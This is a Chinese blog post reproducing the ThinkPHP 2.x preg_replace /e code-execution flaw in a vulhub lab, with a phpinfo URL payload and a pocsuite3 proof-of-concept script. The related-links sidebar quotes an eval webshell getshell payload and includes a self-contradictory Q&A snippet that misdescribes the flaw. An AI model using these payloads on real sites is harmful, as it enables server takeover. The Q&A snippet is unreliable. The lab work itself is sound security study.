thinkphp 2.x 任意代码执行

已于 2022-04-16 11:03:32 修改
阅读量1.7k 收藏 1
点赞数
分类专栏: vulhub 文章标签: php 安全 web安全
于 2021-12-16 09:08:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/121966932
版权

thinkphp 2.x任意代码执行

1.漏洞概述

​ ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

2.环境搭建

​ 在/vulhub/thinkphp/2-rce下执行docker-compose up -d

​ 环境启动后,访问http://192.168.1.142:8080/index.php查看默认页面

在这里插入图片描述

3.漏洞复现

直接访问http://192.168.1.142:8080/index.php?s=/index/index/name/${phpinfo()}即可执行phpinfo()

在这里插入图片描述

POC

from pocsuite3.api import Output, POCBase,register_poc,requests,logger
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD

class DemoPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'wcs'
    vulDate = '2022-04-16'
    createDate = '2022-04-16'
    updateDate = '2022-04-16'
    references = []
    name = 'thinkphp 2-rce 任意代码执行漏洞'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = '任意代码执行'
    desc = '''
        练习pocsuite    
    '''
    samples = []
    install_requires = []

    def _verify(self):
        output = Output(self)
        result = {}   # 验证代码
        payload = "/index.php?s=/index/index/name/${phpinfo()}"
        url = self.url
        try:
            resq = requests.get(url+payload)
            if resq and resq.status_code == 200 and "PHP Version" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
    def _attack(self):
        return self._verify()
register_poc(DemoPOC)

这个POC主要是自己练习使用pocsuite,就利用了现成的靶场,验证代码也比较简单
在这里插入图片描述

小白头发少
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2190
thinkphp-命令执行】日志包含
thinkphp-2x-rce 代码执行
yzl_007的博客
09-19 380
thinkphp-2x-rce 代码执行 打开环境 漏洞描述 ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 。 在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = pre
ThinkPHP 2.x 任意代码执行漏洞
weixin_60329395的博客
10-10 1708
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:depr,paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1075
thinkphp3.2.3 代码执行
Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现
qq_34788994的博客
06-07 1694
转载自 文章目录 闲扯 影响版本 原理分析 漏洞复现 闲扯 学习代码执行的审计时,遇到了双引号的一些迷惑,搜资料的时候发现了这个漏洞,顺便分析复现一哈。 影响版本 2.x、3.0-3.1 原理分析 关键代码: $depr = '\/'; $paths = explode($depr,trim($_SERVER['PATH_INFO'],'/')); $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$v
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp5.X-Batch-getshell-master.rar
03-31
ThinkPHP5.x中,可能存在这样的情况:当开发者使用某些特定的函数或方法时,如果没有正确地处理用户输入,就可能导致恶意代码执行。例如,使用`exec()`、`system()`等函数时,如果用户提交的数据没有被安全地...
ThinkPHP 6.x反序列化POP链(三)1
08-03
攻击者可以构造特定的序列化数据,通过`payload`参数传递给应用程序,触发POP链,最终达到执行任意代码的目的。 总结起来,ThinkPHP 6.x中的这个反序列化POP链利用了`league/flysystem-cached-adapter`库中的`...
ThinkPHP2.1 完全开发手册
01-03
ThinkPHP2.1 完全开发手册 开发文档 原来的2.1版本的 有需要的支持下
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp3.2 运行流程
zhouyuqi1的博客
11-06 1212
//1.入口文件 index.php //首页入口文件 //检测PHP 环境 if (version_compare(PHP_VERSION, '5.3.0', '&lt;')) die('require PHP &gt; 5.3.0 !') ; //是否开启调试模式 define('APP_DEBUG', true); //定义应用目录 define('APP_PATH'...
初识thinkphp(2)
qq_38703140的博客
06-05 144
thinkphp的url路径的表示格式为http://ip/tp/public/index.php/模块/控制器/操作这里url最后的操作就是类里面的函数。0x01:url访问格式官方文档中有个驼峰的命名方法比如你实际目录名写的“HelloWorld”,但在解析的时候会成“helloworld”即默认转化为小写。针对这个问题,可以把url写成“../hello_world/”等价于HelloWor...
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1189
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
thinkPHP2.1 & thinkPHP3.0 分组包含公共模版问题
kevin
04-25 1322
thinkPHP2.1分组中,包含整个项目的公共头部、尾部写法为; 在thinkPHP3.0分组中,用上面的形式不行,改成这样就可以。 哪位高手知道为啥呢
thinkphp任意代码执行漏洞
cnbird's blog
05-16 9927
http://site.com/index.php/module/action/param1/${@phpinfo()} 直接拿SHELL index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c
ThinkPHP框架漏洞 远程代码执行/SQL注入/信息泄露复现(附检测工具)
告白的博客
02-24 4871
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。
thinkphp 2.x 任意代码执行漏洞
最新发布
06-28
### 回答1: 这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的更新。如果发现了任何问题,应该及时向官方反馈。 ### 回答2: thinkphp是一款非常流行的PHP开源框架,其中的2.x版本存在任意代码执行漏洞。该漏洞存在于框架的核心类文件中,攻击者可以构造特殊的参数,在受害者服务器上执行任意代码,导致服务器被入侵,甚至整个网站被控制。 具体来说,当用户的输入作为参数传递给框架的Loader类时,如果没有进行充分的过滤和验证,攻击者就可以通过注入恶意代码,来控制服务器。在thinkphp 2.x版本中,以下方法是存在问题的: ``` thinkphp/library/think/Loader.php -> import()方法 thinkphp/library/think/Template/Driver.php -> abstract parse()方法 ``` 在import方法中,如果用户通过GET或者POST请求向网站提交数据,在没有进行过滤的情况下,该参数会被直接传递给Loader类,当该参数中含有'://'或者'\\'时,Loader类会默认该参数为URL或文件路径,进而执行include等相关操作,这为攻击者提供了一个绕过安全限制的途径。 在parse方法中,如果用户提交了一个包含PHP代码的模板文件,攻击者可以通过提交的数据来控制parse方法执行时所使用的函数和参数,进而达到任意代码执行的效果。 为了避免该漏洞的出现,开发人员需要注意代码编写规范,尽量避免使用用户输入的数据来构造URL或文件路径,同时需要对用户输入进行充分的过滤和验证,包括数据类型、长度、格式等内容。此外,开发人员也可以使用更加先进的开发框架,或者借助第三方安全验证工具,对网站进行全面的安全测试,以及时发现和修复漏洞,保护网站安全。 ### 回答3: ThinkPHP是一款流行的PHP开发框架,被广泛应用于各种Web应用程序的开发。ThinkPHP 2.x是其中的一个早期版本,该版本因存在任意代码执行漏洞而备受关注。 该漏洞存在于ThinkPHP 2.x的模板解析机制中,该机制允许开发人员在视图页面中使用变量替换来展示动态内容。然而,在未对变量进行过滤的情况下,攻击者可以构造恶意变量,从而实现任意代码执行的攻击。 具体来说,攻击者可以通过在URL参数或提交数据中注入恶意变量来触发漏洞。该变量包含恶意代码,以及一些特殊参数来控制代码执行。攻击者可以通过该漏洞来执行系统命令、读取敏感文件、获取访问权限等。 该漏洞的危害性较大,因此开发者应尽快升级到更高版本的ThinkPHP框架,或者采取其他措施来修复漏洞。具体措施包括: 1. 对用户提交的数据进行严格过滤和验证,确保不含有可疑的代码或命令。 2. 设置安全防护机制,如禁止用户上传和执行PHP文件、限制文件读写权限等。 3. 及时升级系统补丁,修复已知的安全漏洞。 总之,任意代码执行漏洞是一种非常危险的漏洞类型,需要开发人员加强安全意识和技术能力,采取有效的预防和修复措施,以确保Web应用程序的安全可靠。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值